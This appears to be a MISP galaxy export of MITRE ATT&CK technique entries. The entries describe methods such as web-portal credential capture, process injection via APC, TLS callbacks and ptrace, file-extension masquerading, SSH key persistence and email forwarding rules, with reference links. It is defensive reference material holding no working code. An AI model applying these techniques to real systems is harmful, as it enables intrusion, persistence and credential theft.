Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.

This variation on input capture may be conducted post-compromise using legitimate administrative access as a backup measure to maintain network access through [External Remote Services](https://attack.mitre.org/techniques/T1133) and [Valid Accounts](https://attack.mitre.org/techniques/T1078) or as part of the initial compromise by exploitation of the externally facing web service.(Citation: Volexity Virtual Private Keylogging)

The tag is: misp-galaxy:mitre-attack-pattern="Web Portal Capture - T1056.003"

Table 5675. Table References

Links

https://attack.mitre.org/techniques/T1056/003

https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/

Container Orchestration Job - T1053.007

Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.

In Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)

The tag is: misp-galaxy:mitre-attack-pattern="Container Orchestration Job - T1053.007"

Table 5676. Table References

Links

https://attack.mitre.org/techniques/T1053/007

https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/

https://kubernetes.io/docs/concepts/workloads/controllers/job/

https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/

Windows Command Shell - T1059.003

Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)

Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.

The tag is: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003"

Table 5677. Table References

Links

https://attack.mitre.org/techniques/T1059/003

https://docs.microsoft.com/en-us/windows/terminal/tutorials/ssh

Network Trust Dependencies - T1590.003

Adversaries may gather information about the victim’s network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network trusts may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)).(Citation: Pentesting AD Forests) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Trust Dependencies - T1590.003"

Table 5678. Table References

Links

https://attack.mitre.org/techniques/T1590/003

https://www.slideshare.net/rootedcon/carlos-garca-pentesting-active-directory-forests-rooted2019

Space after Filename - T1036.006

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.

For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:mitre-attack-pattern="Space after Filename - T1036.006"

Table 5679. Table References

Links

https://arstechnica.com/security/2016/07/after-hiatus-in-the-wild-mac-backdoors-are-suddenly-back/

https://attack.mitre.org/techniques/T1036/006

Double File Extension - T1036.007

Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system’s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)

Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user’s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)

Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.

The tag is: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007"

Table 5680. Table References

Links

https://attack.mitre.org/techniques/T1036/007

https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/

https://www.pcmag.com/encyclopedia/term/double-extension

https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/

Install Digital Certificate - T1608.003

Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner’s identity, and the digital signature of an entity that has verified the certificate’s contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)

Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers.

Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).

The tag is: misp-galaxy:mitre-attack-pattern="Install Digital Certificate - T1608.003"

Table 5681. Table References

Links

https://attack.mitre.org/techniques/T1608/003

https://www.digicert.com/kb/ssl-certificate-installation.htm

https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html

Masquerade File Type - T1036.008

Adversaries may masquerade malicious payloads as legitimate files through changes to the payload’s formatting, including the file’s signature, extension, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is <code> 0xFF 0xD8</code> and the file extension is either .JPE, .JPEG or .JPG.

Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections.

Common non-executable file types and extensions, such as text files (.txt) and image files (.jpg, .gif, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of <code>test.gif</code>. A user may not know that a file is malicious due to the benign appearance and file extension.

Polygot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade File Type - T1036.008"

Table 5682. Table References

Links

https://attack.mitre.org/techniques/T1036/008

https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload

Break Process Trees - T1036.009

An adversary may attempt to evade process tree-based analysis by modifying executed malware’s parent process ID (PPID). If endpoint protection software leverages the “parent-child" relationship for detection, breaking this relationship could result in the adversary’s behavior not being associated with previous process tree activity. On Unix-based systems breaking this process tree is common practice for administrators to execute software using scripts and programs.(Citation: 3OHA double-fork 2022)

On Linux systems, adversaries may execute a series of [Native API](https://attack.mitre.org/techniques/T1106) calls to alter malware’s process tree. For example, adversaries can execute their payload without any arguments, call the fork() API call twice, then have the parent process exit. This creates a grandchild process with no parent process that is immediately adopted by the init system process (PID 1), which successfully disconnects the execution of the adversary’s payload from its previous process tree.

Another example is using the “daemon” syscall to detach from the current parent process and run in the background.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022)

The tag is: misp-galaxy:mitre-attack-pattern="Break Process Trees - T1036.009"

Table 5683. Table References

Links

https://0xjet.github.io/3OHA/2022/04/11/post.html

https://attack.mitre.org/techniques/T1036/009

https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/

Additional Cloud Roles - T1098.003

An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).(Citation: Expel AWS Attacker) (Citation: Microsoft O365 Admin Roles)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This could lead to privilege escalation, particularly if the roles added allow for lateral movement to additional accounts.

For example, in AWS environments, an adversary with appropriate permissions may be able to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional or distinct permissions to a compromised user account.(Citation: Rhino Security Labs AWS Privilege Escalation)

The tag is: misp-galaxy:mitre-attack-pattern="Additional Cloud Roles - T1098.003"

Table 5684. Table References

Links

https://attack.mitre.org/techniques/T1098/003

https://cloud.google.com/iam/docs/policies

https://docs.aws.amazon.com/IAM/latest/UserGuide/access_policies.html

https://docs.microsoft.com/en-us/office365/admin/add-users/about-admin-roles?view=o365-worldwide

https://expel.com/blog/incident-report-from-cli-to-console-chasing-an-attacker-in-aws/

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d

Asynchronous Procedure Call - T1055.004

Adversaries may inject malicious code into processes via the asynchronous procedure call (APC) queue in order to evade process-based defenses as well as possibly elevate privileges. APC injection is a method of executing arbitrary code in the address space of a separate live process.

APC injection is commonly performed by attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process’s thread. Queued APC functions are executed when the thread enters an alterable state.(Citation: Microsoft APC) A handle to an existing victim process is first created with native Windows API calls such as <code>OpenThread</code>. At this point <code>QueueUserAPC</code> can be used to invoke a function (such as <code>LoadLibrayA</code> pointing to a malicious DLL).

A variation of APC injection, dubbed "Early Bird injection", involves creating a suspended process in which malicious code can be written and executed before the process' entry point (and potentially subsequent anti-malware hooks) via an APC. (Citation: CyberBit Early Bird Apr 2018) AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is another variation that utilizes APCs to invoke malicious code previously written to the global atom table.(Citation: Microsoft Atom Table)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via APC injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004"

Table 5685. Table References

Links

https://attack.mitre.org/techniques/T1055/004

https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows

https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx

https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx

https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Web Session Cookie - T1550.004"

Table 5686. Table References

Links

https://attack.mitre.org/techniques/T1550/004

https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/

https://wunderwuzzi23.github.io/blog/passthecookie.html

Credential API Hooking - T1056.004

Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.(Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017) Unlike [Keylogging](https://attack.mitre.org/techniques/T1056/001), this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:

  • Hooks procedures, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs.(Citation: Microsoft Hook Overview)(Citation: Elastic Process Injection July 2017)

  • Import address table (IAT) hooking, which use modifications to a process’s IAT, where pointers to imported API functions are stored.(Citation: Elastic Process Injection July 2017)(Citation: Adlice Software IAT Hooks Oct 2014)(Citation: MWRInfoSecurity Dynamic Hooking 2015)

  • Inline hooking, which overwrites the first bytes in an API function to redirect code flow.(Citation: Elastic Process Injection July 2017)(Citation: HighTech Bridge Inline Hooking Sept 2011)(Citation: MWRInfoSecurity Dynamic Hooking 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Credential API Hooking - T1056.004"

Table 5687. Table References

Links

http://www.gmer.net/

https://attack.mitre.org/techniques/T1056/004

https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/

https://github.com/jay/gethooks

https://github.com/prekageo/winhook

https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx

https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx

https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis

https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html

https://www.adlice.com/userland-rootkits-part-1-iat-hooks/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.exploit-db.com/docs/17802.pdf

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918

https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/

https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/

SSH Authorized Keys - T1098.004

Adversaries may modify the SSH <code>authorized_keys</code> file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user’s home directory under <code><user-home>/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under <code>/etc/ssh/sshd_config</code>.

Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user.

Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user.

SSH keys can also be added to accounts on network devices, such as with the ip ssh pubkey-chain [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)

The tag is: misp-galaxy:mitre-attack-pattern="SSH Authorized Keys - T1098.004"

Table 5688. Table References

Links

https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/

https://attack.mitre.org/techniques/T1098/004

https://cloud.google.com/sdk/gcloud/reference/compute/instances/add-metadata

https://docs.microsoft.com/en-us/rest/api/compute/virtual-machines/update

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/d1/sec-d1-cr-book/sec-cr-i3.html#wp1254331478

https://www.cybereason.com/blog/new-pervasive-worm-exploiting-linux-exim-server-vulnerability

https://www.ssh.com/ssh/authorized_keys/

https://www.venafi.com/blog/growing-abuse-ssh-keys-commodity-malware-campaigns-now-equipped-ssh-capabilities

Terminal Services DLL - T1505.005

Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)

[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: <code>svchost.exe</code>) load the service’s DLL file, the location of which is stored in a Registry entry named <code>ServiceDll</code>.(Citation: Microsoft System Services Fundamentals) The <code>termsrv.dll</code> file, typically stored in %SystemRoot%\System32\, is the default <code>ServiceDll</code> value for Terminal Services in HKLM\System\CurrentControlSet\services\TermService\Parameters\.

Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal <code>termsrv.dll</code> functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the <code>termsrv.dll</code> file or modifying the <code>ServiceDll</code> value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.

The tag is: misp-galaxy:mitre-attack-pattern="Terminal Services DLL - T1505.005"

Table 5689. Table References

Links

http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/

https://attack.mitre.org/techniques/T1505/005

https://docs.microsoft.com/windows/win32/termserv/about-terminal-services

https://github.com/stascorp/rdpwrap

https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx

https://twitter.com/james_inthe_box/status/1150495335812177920

Thread Local Storage - T1055.005

Adversaries may inject malicious code into processes via thread local storage (TLS) callbacks in order to evade process-based defenses as well as possibly elevate privileges. TLS callback injection is a method of executing arbitrary code in the address space of a separate live process.

TLS callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code’s legitimate entry point. TLS callbacks are normally used by the OS to setup and/or cleanup data used by threads. Manipulating TLS callbacks may be performed by allocating and writing to specific offsets within a process’ memory space using other [Process Injection](https://attack.mitre.org/techniques/T1055) techniques such as [Process Hollowing](https://attack.mitre.org/techniques/T1055/012).(Citation: FireEye TLS Nov 2017)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via TLS callback injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Thread Local Storage - T1055.005"

Table 5690. Table References

Links

https://attack.mitre.org/techniques/T1055/005

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html

Ptrace System Calls - T1055.008

Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process.

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values.(Citation: PTRACE man) Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). (Citation: PTRACE man)(Citation: Medium Ptrace JUL 2018)

Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges.(Citation: BH Linux Inject)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Ptrace System Calls - T1055.008"

Table 5691. Table References

Links

http://man7.org/linux/man-pages/man2/ptrace.2.html

http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html

https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing

https://attack.mitre.org/techniques/T1055/008

https://github.com/gaffe23/linux-inject/blob/master/slides_BHArsenal2015.pdf

https://medium.com/@jain.sm/code-injection-in-running-process-using-ptrace-d3ea7191a4be

https://www.gnu.org/software/acct/

Network Security Appliances - T1590.006

Adversaries may gather information about the victim’s network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598).(Citation: Nmap Firewalls NIDS) Information about network security appliances may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Security Appliances - T1590.006"

Table 5692. Table References

Links

https://attack.mitre.org/techniques/T1590/006

https://nmap.org/book/firewalls.html

Network Device CLI - T1059.008

Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.

Scripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://attack.mitre.org/techniques/T1021/004).

Adversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.(Citation: Cisco Synful Knock Evolution)

The tag is: misp-galaxy:mitre-attack-pattern="Network Device CLI - T1059.008"

Table 5693. Table References

Links

https://attack.mitre.org/techniques/T1059/008

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

Local Email Collection - T1114.001

Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.

Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.(Citation: Outlook File Sizes) IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in C:\Users\<username>\Documents\Outlook Files or C:\Users\<username>\AppData\Local\Microsoft\Outlook.(Citation: Microsoft Outlook Files)

The tag is: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001"

Table 5694. Table References

Links

https://attack.mitre.org/techniques/T1114/001

https://practical365.com/clients/office-365-proplus/outlook-cached-mode-ost-file-sizes/

https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790

Remote Email Collection - T1114.002

Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user’s credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google Workspace to access email using credentials or access tokens. Tools such as [MailSniper](https://attack.mitre.org/software/S0413) can be used to automate searches for specific keywords.

The tag is: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002"

Table 5695. Table References

Links

https://attack.mitre.org/techniques/T1114/002

Compiled HTML File - T1218.001

Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1218.001"

Table 5696. Table References

Links

https://attack.mitre.org/techniques/T1218/001

https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk

https://msdn.microsoft.com/windows/desktop/ms524405

https://msdn.microsoft.com/windows/desktop/ms644670

https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

Email Forwarding Rule - T1114.003

Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim’s emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives.

The tag is: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003"

Table 5697. Table References

Links

https://attack.mitre.org/techniques/T1114/003

https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/

https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/

